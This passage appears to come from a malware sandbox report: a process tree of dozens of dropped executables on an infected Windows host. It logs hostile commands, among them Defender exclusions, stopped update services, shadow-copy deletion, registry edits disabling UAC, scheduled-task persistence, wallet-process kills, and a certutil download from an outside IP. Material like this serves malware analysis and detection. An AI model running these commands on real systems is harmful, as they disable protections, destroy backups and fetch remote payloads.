- System Location Discovery: System Language Discovery
PID:6100 -
C:\Users\Admin\AppData\Local\Temp\3036535491.exeC:\Users\Admin\AppData\Local\Temp\3036535491.exe6⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:1140
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5012 -s 15245⤵
- Program crash
PID:4428
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\frap.exe"C:\Users\Admin\AppData\Local\Temp\Files\frap.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3092
-
-
C:\Users\Admin\AppData\Local\Temp\Files\Meeting-https.exe"C:\Users\Admin\AppData\Local\Temp\Files\Meeting-https.exe"3⤵
- Executes dropped EXE
PID:5804
-
-
C:\Users\Admin\AppData\Local\Temp\Files\inst77player_1.0.0.1.exe"C:\Users\Admin\AppData\Local\Temp\Files\inst77player_1.0.0.1.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
PID:5992 -
C:\Program Files (x86)\òÐòÐÎåÏßÆײ¥·ÅÆ÷\inst77player.exe"C:\Program Files (x86)\òÐòÐÎåÏßÆײ¥·ÅÆ÷\inst77player.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
PID:3184
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\tdrpload.exe"C:\Users\Admin\AppData\Local\Temp\Files\tdrpload.exe"3⤵
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
PID:5180 -
C:\Windows\sysppvrdnvs.exeC:\Windows\sysppvrdnvs.exe4⤵
- Modifies security service
- Windows security bypass
- Checks computer location settings
- Executes dropped EXE
- Windows security modification
- Suspicious behavior: SetClipboardViewer
PID:672 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"5⤵
- System Location Discovery: System Language Discovery
PID:5160 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:6080
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop DoSvc & sc stop BITS /wait5⤵PID:5944
-
C:\Windows\SysWOW64\sc.exesc stop UsoSvc6⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:6028
-
-
C:\Windows\SysWOW64\sc.exesc stop WaaSMedicSvc6⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:6052
-
-
C:\Windows\SysWOW64\sc.exesc stop wuauserv6⤵
- Launches sc.exe
PID:6120
-
-
C:\Windows\SysWOW64\sc.exesc stop DoSvc6⤵
- Launches sc.exe
PID:632
-
-
C:\Windows\SysWOW64\sc.exesc stop BITS /wait6⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:2160
-
-
-
C:\Users\Admin\AppData\Local\Temp\41986531.exeC:\Users\Admin\AppData\Local\Temp\41986531.exe5⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:5136 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f6⤵PID:5236
-
C:\Windows\system32\reg.exereg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f7⤵PID:5252
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /delete /f /tn "Windows Upgrade Manager"6⤵PID:5848
-
C:\Windows\system32\schtasks.exeschtasks /delete /f /tn "Windows Upgrade Manager"7⤵PID:632
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1342430716.exeC:\Users\Admin\AppData\Local\Temp\1342430716.exe5⤵
- Executes dropped EXE
PID:5624
-
-
C:\Users\Admin\AppData\Local\Temp\3084722593.exeC:\Users\Admin\AppData\Local\Temp\3084722593.exe5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5940
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\o.exe"C:\Users\Admin\AppData\Local\Temp\Files\o.exe"3⤵
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
PID:2920 -
C:\Windows\sysklnorbcv.exeC:\Windows\sysklnorbcv.exe4⤵
- Modifies security service
- Windows security bypass
- Checks computer location settings
- Executes dropped EXE
- Windows security modification
- System Location Discovery: System Language Discovery
- Suspicious behavior: SetClipboardViewer
PID:5652 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"5⤵
- System Location Discovery: System Language Discovery
PID:5644 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"6⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:1236
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop DoSvc & sc stop BITS5⤵PID:4768
-
C:\Windows\SysWOW64\sc.exesc stop UsoSvc6⤵
- Launches sc.exe
PID:2960
-
-
C:\Windows\SysWOW64\sc.exesc stop WaaSMedicSvc6⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:5640
-
-
C:\Windows\SysWOW64\sc.exesc stop wuauserv6⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:5224
-
-
C:\Windows\SysWOW64\sc.exesc stop DoSvc6⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:632
-
-
C:\Windows\SysWOW64\sc.exesc stop BITS6⤵
- Launches sc.exe
PID:3604
-
-
-
C:\Users\Admin\AppData\Local\Temp\1066112755.exeC:\Users\Admin\AppData\Local\Temp\1066112755.exe5⤵
- Checks computer location settings
- Executes dropped EXE
PID:3824 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f6⤵PID:5224
-
C:\Windows\system32\reg.exereg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f7⤵PID:5388
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /delete /f /tn "Windows Upgrade Manager"6⤵PID:6088
-
C:\Windows\system32\schtasks.exeschtasks /delete /f /tn "Windows Upgrade Manager"7⤵PID:5356
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\334793917.exeC:\Users\Admin\AppData\Local\Temp\334793917.exe5⤵
- Executes dropped EXE
PID:1316
-
-
C:\Users\Admin\AppData\Local\Temp\2074828513.exeC:\Users\Admin\AppData\Local\Temp\2074828513.exe5⤵
- Executes dropped EXE
PID:5208
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\first.exe"C:\Users\Admin\AppData\Local\Temp\Files\first.exe"3⤵
- Checks computer location settings
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: AddClipboardFormatListener
PID:4772 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'first.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:5732
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Files\first.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:4748 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵PID:2960
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\tpeinf.exe"C:\Users\Admin\AppData\Local\Temp\Files\tpeinf.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5628
-
-
C:\Users\Admin\AppData\Local\Temp\Files\XClient.exe"C:\Users\Admin\AppData\Local\Temp\Files\XClient.exe"3⤵
- Executes dropped EXE
PID:3400
-
-
C:\Users\Admin\AppData\Local\Temp\Files\splwow64.exe"C:\Users\Admin\AppData\Local\Temp\Files\splwow64.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
PID:5200 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c copy Beijing Beijing.bat & Beijing.bat4⤵
- System Location Discovery: System Language Discovery
PID:5620 -
C:\Windows\SysWOW64\tasklist.exetasklist5⤵
- Enumerates processes with tasklist
PID:5576
-
-
C:\Windows\SysWOW64\findstr.exefindstr /I "wrsa opssvc"5⤵PID:4476
-
-
C:\Windows\SysWOW64\tasklist.exetasklist5⤵
- Enumerates processes with tasklist
PID:2600
-
-
C:\Windows\SysWOW64\findstr.exefindstr -I "avastui avgui bdservicehost nswscsvc sophoshealth"5⤵PID:4032
-
-
C:\Windows\SysWOW64\cmd.execmd /c md 1970365⤵PID:408
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V "CRAWFORDFILLEDVERIFYSCALE" Mtv5⤵PID:6060
-
-
C:\Windows\SysWOW64\cmd.execmd /c copy /b ..\Twisted + ..\Molecular + ..\Sponsorship + ..\Various + ..\Witch + ..\Spirit + ..\See + ..\Fitting T5⤵PID:5936
-
-
C:\Users\Admin\AppData\Local\Temp\197036\Jurisdiction.pifJurisdiction.pif T5⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:5772
-
-
C:\Windows\SysWOW64\choice.exechoice /d y /t 55⤵
- System Location Discovery: System Language Discovery
PID:2840
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\XClient_protected.exe"C:\Users\Admin\AppData\Local\Temp\Files\XClient_protected.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4052
-
-
C:\Users\Admin\AppData\Local\Temp\Files\khtoawdltrha.exe"C:\Users\Admin\AppData\Local\Temp\Files\khtoawdltrha.exe"3⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetWindowsHookEx
PID:3200
-
-
C:\Users\Admin\AppData\Local\Temp\Files\pp.exe"C:\Users\Admin\AppData\Local\Temp\Files\pp.exe"3⤵
- Executes dropped EXE
PID:1512
-
-
C:\Users\Admin\AppData\Local\Temp\Files\CoronaVirus.exe"C:\Users\Admin\AppData\Local\Temp\Files\CoronaVirus.exe"3⤵
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- Drops desktop.ini file(s)
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
PID:4532 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe"4⤵PID:1152
-
C:\Windows\system32\mode.commode con cp select=12515⤵PID:7712
-
-
C:\Windows\system32\vssadmin.exevssadmin delete shadows /all /quiet5⤵
- Interacts with shadow copies
PID:7832
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4532 -s 15844⤵
- Program crash
PID:4956
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\Installeraus.exe"C:\Users\Admin\AppData\Local\Temp\Files\Installeraus.exe"3⤵
- Executes dropped EXE
PID:1420 -
C:\Users\Admin\AppData\Roaming\MSIX\meshagent32-group.exe"C:\Users\Admin\AppData\Roaming\MSIX\meshagent32-group.exe" -fullinstall4⤵
- Sets service image path in registry
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:4508
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\SingerJudy.exe"C:\Users\Admin\AppData\Local\Temp\Files\SingerJudy.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
PID:4664 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c move Attacked Attacked.bat & Attacked.bat4⤵PID:1448
-
C:\Windows\SysWOW64\tasklist.exetasklist5⤵
- Enumerates processes with tasklist
PID:5716
-
-
C:\Windows\SysWOW64\findstr.exefindstr /I "wrsa opssvc"5⤵PID:5384
-
-
C:\Windows\SysWOW64\tasklist.exetasklist5⤵
- Enumerates processes with tasklist
PID:3028
-
-
C:\Windows\SysWOW64\findstr.exefindstr /I "avastui avgui bdservicehost nswscsvc sophoshealth"5⤵
- System Location Discovery: System Language Discovery
PID:1776
-
-
C:\Windows\SysWOW64\cmd.execmd /c md 3478615⤵PID:1420
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V "systemadaptermeetingskenneth" Grow5⤵PID:1332
-
-
C:\Windows\SysWOW64\cmd.execmd /c copy /b ..\Officer + ..\Essays + ..\Cool + ..\Prompt + ..\Itunes G5⤵PID:4620
-
-
C:\Users\Admin\AppData\Local\Temp\347861\Councils.pifCouncils.pif G5⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
PID:4548 -
C:\Users\Admin\AppData\Local\Temp\347861\RegAsm.exeC:\Users\Admin\AppData\Local\Temp\347861\RegAsm.exe6⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:11424
-
-
-
C:\Windows\SysWOW64\choice.exechoice /d y /t 55⤵PID:4684
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\Journal.exe"C:\Users\Admin\AppData\Local\Temp\Files\Journal.exe"3⤵
- Executes dropped EXE
PID:4552
-
-
C:\Users\Admin\AppData\Local\Temp\Files\exclude.exe"C:\Users\Admin\AppData\Local\Temp\Files\exclude.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
PID:3780 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "Add-MpPreference -ExclusionPath C:\Users"4⤵
- Command and Scripting Interpreter: PowerShell
PID:1544
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\tt.exe"C:\Users\Admin\AppData\Local\Temp\Files\tt.exe"3⤵
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Windows directory
PID:6088 -
C:\Windows\sysmablsvr.exeC:\Windows\sysmablsvr.exe4⤵
- Modifies security service
- Windows security bypass
- Executes dropped EXE
- Windows security modification
- System Location Discovery: System Language Discovery
- Suspicious behavior: SetClipboardViewer
PID:3196 -
C:\Users\Admin\AppData\Local\Temp\1234230369.exeC:\Users\Admin\AppData\Local\Temp\1234230369.exe5⤵
- Checks computer location settings
- Executes dropped EXE
PID:1668 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f6⤵PID:5472
-
C:\Windows\system32\reg.exereg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f7⤵PID:1768
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /delete /f /tn "Windows Upgrade Manager"6⤵PID:64
-
C:\Windows\system32\schtasks.exeschtasks /delete /f /tn "Windows Upgrade Manager"7⤵PID:1252
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\2963921430.exeC:\Users\Admin\AppData\Local\Temp\2963921430.exe5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:644
-
-
C:\Users\Admin\AppData\Local\Temp\1975213000.exeC:\Users\Admin\AppData\Local\Temp\1975213000.exe5⤵
- Executes dropped EXE
PID:8128
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\BaddStore.exe"C:\Users\Admin\AppData\Local\Temp\Files\BaddStore.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
PID:1268 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe"4⤵
- Adds Run key to start application
- System Location Discovery: System Language Discovery
PID:2816 -
C:\Users\Admin\AppData\Local\Temp\Files\._cache_aspnet_regiis.exe"C:\Users\Admin\AppData\Local\Temp\Files\._cache_aspnet_regiis.exe"5⤵
- Executes dropped EXE
PID:1380
-
-
C:\ProgramData\Synaptics\Synaptics.exe"C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate5⤵
- Executes dropped EXE
PID:2208
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\msf.exe"C:\Users\Admin\AppData\Local\Temp\Files\msf.exe"3⤵
- Executes dropped EXE
PID:5956
-
-
C:\Users\Admin\AppData\Local\Temp\Files\bwapp.exe"C:\Users\Admin\AppData\Local\Temp\Files\bwapp.exe"3⤵
- Executes dropped EXE
- Adds Run key to start application
PID:7628
-
-
C:\Users\Admin\AppData\Local\Temp\Files\av_downloader.exe"C:\Users\Admin\AppData\Local\Temp\Files\av_downloader.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:6796 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\70FB.tmp\710C.tmp\710D.bat C:\Users\Admin\AppData\Local\Temp\Files\av_downloader.exe"4⤵PID:4412
-
C:\Windows\system32\mshta.exemshta vbscript:createobject("shell.application").shellexecute("C:\Users\Admin\AppData\Local\Temp\Files\AV_DOW~1.EXE","goto :target","","runas",1)(window.close)5⤵
- Checks computer location settings
- Access Token Manipulation: Create Process with Token
PID:6620 -
C:\Users\Admin\AppData\Local\Temp\Files\AV_DOW~1.EXE"C:\Users\Admin\AppData\Local\Temp\Files\AV_DOW~1.EXE" goto :target6⤵
- Executes dropped EXE
PID:7304 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\950D.tmp\955D.tmp\955E.bat C:\Users\Admin\AppData\Local\Temp\Files\AV_DOW~1.EXE goto :target"7⤵
- Enumerates connected drives
PID:9616 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "ConsentPromptBehaviorAdmin" /t reg_dword /d 0 /F8⤵
- UAC bypass
PID:9416
-
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA" /t reg_dword /d 0 /F8⤵
- UAC bypass
PID:9272
-
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "PromptOnSecureDesktop" /t reg_dword /d 0 /F8⤵
- UAC bypass
PID:6904
-
-
C:\Windows\system32\attrib.exeattrib +s +h e:\net8⤵
- Sets file to hidden
- Views/modifies file attributes
PID:7504
-
-
C:\Windows\system32\certutil.execertutil -urlcache -split -f http://206.217.142.166:1234/windows/dr/dr.bat e:\net\dr\dr.bat8⤵PID:6744
-
-
C:\Windows\system32\certutil.execertutil -urlcache * delete8⤵PID:10756
-
-
C:\Windows\system32\schtasks.exeSchTasks /Create /SC ONLOGON /TN "my dr" /TR "e:\net\dr\dr.bat" /f8⤵
- Scheduled Task/Job: Scheduled Task
PID:6476
-
-
C:\Windows\system32\timeout.exeTIMEOUT /T 1008⤵
- Delays execution with timeout.exe
PID:8728
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\2.exe"C:\Users\Admin\AppData\Local\Temp\Files\2.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:6468
-
-
C:\Users\Admin\AppData\Local\Temp\Files\Client-built.exe"C:\Users\Admin\AppData\Local\Temp\Files\Client-built.exe"3⤵
- Executes dropped EXE
PID:9088 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "MS Build Tools" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Microsoft-Build-Tools\Client.exe" /rl HIGHEST /f4⤵
- Scheduled Task/Job: Scheduled Task
PID:5368
-
-
C:\Users\Admin\AppData\Roaming\Microsoft-Build-Tools\Client.exe"C:\Users\Admin\AppData\Roaming\Microsoft-Build-Tools\Client.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:9336 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "MS Build Tools" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Microsoft-Build-Tools\Client.exe" /rl HIGHEST /f5⤵
- Scheduled Task/Job: Scheduled Task
PID:9644
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\Windows.exe"C:\Users\Admin\AppData\Local\Temp\Files\Windows.exe"3⤵
- Executes dropped EXE
PID:7888
-
-
C:\Users\Admin\AppData\Local\Temp\Files\explorer.exe"C:\Users\Admin\AppData\Local\Temp\Files\explorer.exe"3⤵
- Checks computer location settings
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:11476 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Files\explorer.exe'4⤵
- Command and Scripting Interpreter: PowerShell
PID:8984
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'explorer.exe'4⤵
- Command and Scripting Interpreter: PowerShell
PID:8096
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\explorer.exe'4⤵
- Command and Scripting Interpreter: PowerShell
PID:6388
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'explorer.exe'4⤵
- Command and Scripting Interpreter: PowerShell
PID:9796
-
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "explorer" /tr "C:\ProgramData\explorer.exe"4⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:8876
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 11476 -s 29764⤵
- Program crash
PID:9052
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\build555.exe"C:\Users\Admin\AppData\Local\Temp\Files\build555.exe"3⤵
- Executes dropped EXE
PID:6728
-
-
C:\Users\Admin\AppData\Local\Temp\Files\def.exe"C:\Users\Admin\AppData\Local\Temp\Files\def.exe"3⤵
- Modifies Windows Defender Real-time Protection settings
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Windows security modification
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
PID:11044
-
-
C:\Users\Admin\AppData\Local\Temp\Files\pimer_bbbcontents7.exe"C:\Users\Admin\AppData\Local\Temp\Files\pimer_bbbcontents7.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:7068 -
C:\Users\Admin\AppData\Local\Temp\Files\pimer_bbbcontents7.exe"C:\Users\Admin\AppData\Local\Temp\Files\pimer_bbbcontents7.exe"4⤵
- Executes dropped EXE
PID:2156
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\Sentil.exe"C:\Users\Admin\AppData\Local\Temp\Files\Sentil.exe"3⤵
- Executes dropped EXE
PID:6912 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Startup" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client1.exe" /rl HIGHEST /f4⤵
- Scheduled Task/Job: Scheduled Task
PID:6612
-
-
C:\Users\Admin\AppData\Roaming\SubDir\Client1.exe"C:\Users\Admin\AppData\Roaming\SubDir\Client1.exe"4⤵
- Suspicious use of SetWindowsHookEx
PID:6664 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Startup" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client1.exe" /rl HIGHEST /f5⤵
- Scheduled Task/Job: Scheduled Task
PID:7080
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\InfluencedNervous.exe"C:\Users\Admin\AppData\Local\Temp\Files\InfluencedNervous.exe"3⤵
- Checks computer location settings
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
PID:9628 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k copy Fail Fail.cmd & Fail.cmd & exit4⤵PID:9296
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\npp.exe"C:\Users\Admin\AppData\Local\Temp\Files\npp.exe"3⤵
- System Location Discovery: System Language Discovery
PID:8840 -
C:\Users\Admin\AppData\Local\Temp\1713315379.exeC:\Users\Admin\AppData\Local\Temp\1713315379.exe4⤵
- Adds Run key to start application
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
PID:10840 -
C:\Windows\sysnldcvmr.exeC:\Windows\sysnldcvmr.exe5⤵
- Suspicious behavior: SetClipboardViewer
PID:7496 -
C:\Users\Admin\AppData\Local\Temp\147585972.exeC:\Users\Admin\AppData\Local\Temp\147585972.exe6⤵
- Checks computer location settings
PID:11592 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f7⤵PID:11940
-
C:\Windows\system32\reg.exereg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f8⤵PID:11848
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /delete /f /tn "Windows Upgrade Manager"7⤵PID:11888
-
C:\Windows\system32\schtasks.exeschtasks /delete /f /tn "Windows Upgrade Manager"8⤵PID:11820
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\982626737.exeC:\Users\Admin\AppData\Local\Temp\982626737.exe6⤵PID:12028
-
-
C:\Users\Admin\AppData\Local\Temp\2750020248.exeC:\Users\Admin\AppData\Local\Temp\2750020248.exe6⤵
- System Location Discovery: System Language Discovery
PID:1504
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\4434.exe"C:\Users\Admin\AppData\Local\Temp\Files\4434.exe"3⤵
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:11032 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"4⤵
- System Location Discovery: System Language Discovery
PID:7508
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\1.exe"C:\Users\Admin\AppData\Local\Temp\Files\1.exe"3⤵
- System Location Discovery: System Language Discovery
PID:6272
-
-
C:\Users\Admin\AppData\Local\Temp\Files\Ghost_0x000263826B9A9B91.exe"C:\Users\Admin\AppData\Local\Temp\Files\Ghost_0x000263826B9A9B91.exe"3⤵PID:11356
-
-
C:\Users\Admin\AppData\Local\Temp\Files\bot2.exe"C:\Users\Admin\AppData\Local\Temp\Files\bot2.exe"3⤵PID:12056
-
C:\Users\Admin\AppData\Local\Temp\Files\bot2.exe"C:\Users\Admin\AppData\Local\Temp\Files\bot2.exe"4⤵
- Loads dropped DLL
PID:6200 -
C:\Windows\SYSTEM32\taskkill.exetaskkill /F /IM ArmoryQt.exe5⤵
- Kills process with taskkill
PID:11156
-
-
C:\Windows\SYSTEM32\taskkill.exetaskkill /F /IM "Atomic Wallet.exe"5⤵
- Kills process with taskkill
PID:9888
-
-
C:\Windows\SYSTEM32\taskkill.exetaskkill /F /IM bytecoin-gui.exe5⤵
- Kills process with taskkill
PID:10316
-
-
C:\Windows\SYSTEM32\taskkill.exetaskkill /F /IM Coinomi.exe5⤵
- Kills process with taskkill
PID:9172
-
-
C:\Windows\SYSTEM32\taskkill.exetaskkill /F /IM Element.exe5⤵
- Kills process with taskkill
PID:1420
-
-
